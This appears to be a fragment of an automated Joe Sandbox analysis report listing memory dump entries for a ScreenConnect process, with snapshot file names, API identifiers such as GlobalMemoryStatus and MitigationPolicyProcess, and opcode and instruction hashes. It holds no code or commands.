                                                                • Source File: 00000008.00000002.1749264470.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0
                                                                • Opcode ID: d8c8411b996986d3e45486436c0ff9ea9c9da71e8e338117a88713455159f271
                                                                • Instruction ID: 39a635ce29cfa1466f49145c26afcb293bd1eda700672c477f24b415fabb5144
                                                                • Opcode Fuzzy Hash: d8c8411b996986d3e45486436c0ff9ea9c9da71e8e338117a88713455159f271
                                                                • Instruction Fuzzy Hash: D9910971A0E78D4FEB7597A888296F97BE0EF51320F0902BAD08DC75F3DA58650AC741

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.1746913767.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
                                                                • Instruction ID: 8814354eb268e044d2c4550dd507c647ccc7541b7a5639f78e8758f4612157e3
                                                                • Opcode Fuzzy Hash: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
                                                                • Instruction Fuzzy Hash: 66514B31D1DB4D4FDB289FA89C4A5E97BE0EF65310F04017FE489C3192DE68A846C792